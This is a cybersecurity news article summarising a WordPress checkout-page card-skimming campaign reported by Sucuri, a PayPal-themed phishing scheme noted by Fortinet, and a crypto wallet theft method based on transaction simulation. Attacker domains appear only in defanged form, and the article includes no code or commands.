Cybersecurity researchers have issued a warning about a new and stealthy credit card skimming campaign targeting checkout pages on WordPress sites. Threat actors inject malicious JavaScript code into the database, specifically targeting the content management system (CMS).
The security firm Sucuri revealed that the malware embeds JavaScript code into the wp_options table using the widget_block option, enabling it to evade security scanners and maintain stealth. The attack is activated exclusively on checkout pages, where it intercepts data from existing input fields or injects a fraudulent payment form.
This code determines whether the current page is a checkout page and, upon entry of payment details, generates a fake payment screen that mimics processing services like Stripe. The primary objective is to steal card numbers, expiration dates, CVV codes, and other sensitive payment information.
The data captured by the malicious code is encrypted using AES-CBC and Base64 to obfuscate its contents, then transmitted to attacker-controlled servers such as “valhafather[.]xyz” and “fqbe23[.]xyz”.
This campaign is reminiscent of a previously identified scheme in which JavaScript was used to create fake forms or intercept data on genuine payment pages. The compromised information undergoes three layers of encryption: JSON formatting, XOR encoding with a script key, and Base64 encoding.
Meanwhile, Fortinet specialists reported a phishing campaign disguised as a PayPal payment request for approximately $2,200. Using a test domain linked to Microsoft 365, attackers create a mailing list to send emails from a legitimate PayPal address, bypassing security systems. Victims who enter their login credentials unknowingly link their PayPal accounts to the attackers’ addresses, granting them full account control.
Additionally, threat actors have adopted a novel cryptocurrency theft method based on data manipulation during transaction simulations. This technique involves creating counterfeit sites that mimic decentralized applications (DApps) to steal funds from wallets.
Scam Sniffer noted that this attack represents a significant evolution in phishing tactics, as adversaries exploit trusted wallet functions that were previously considered secure, making detection considerably more challenging.
